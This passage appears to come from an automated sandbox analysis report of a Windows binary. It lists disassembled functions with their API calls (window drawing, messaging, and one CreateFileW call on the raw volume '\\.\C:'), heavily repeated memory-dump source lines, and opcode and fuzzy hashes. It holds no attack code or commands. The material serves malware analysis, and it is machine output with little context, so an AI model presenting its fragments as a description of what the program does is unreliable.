                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: %s: %I64u $3401050$3401080
                                                                                                                                                                                                                                                                                    • API String ID: 730354411-73662114
                                                                                                                                                                                                                                                                                    • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                    Function 00423340 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                    • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                    • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                    • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                    Function 00431D10 Relevance: 9.1, APIs: 6, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2414545248-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                    Function 0045FB10 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 371fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,113262B6), ref: 0045FBFD
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                    • Instruction ID: f68b579a164141f6a35d8a11ab023a6fd55b536e149a63f8f0d67cb16e8cd9f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F139B15183419FC324DF25C881AAFB7E4BF89714F104A2EF99983351E778A948CB97
                                                                                                                                                                                                                                                                                    Function 00405230 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                    • String ID: ...$`=
                                                                                                                                                                                                                                                                                    • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                    • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                    Function 004042E0 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                    • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                    • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                    Function 00424AE0 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                    Function 00411050 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
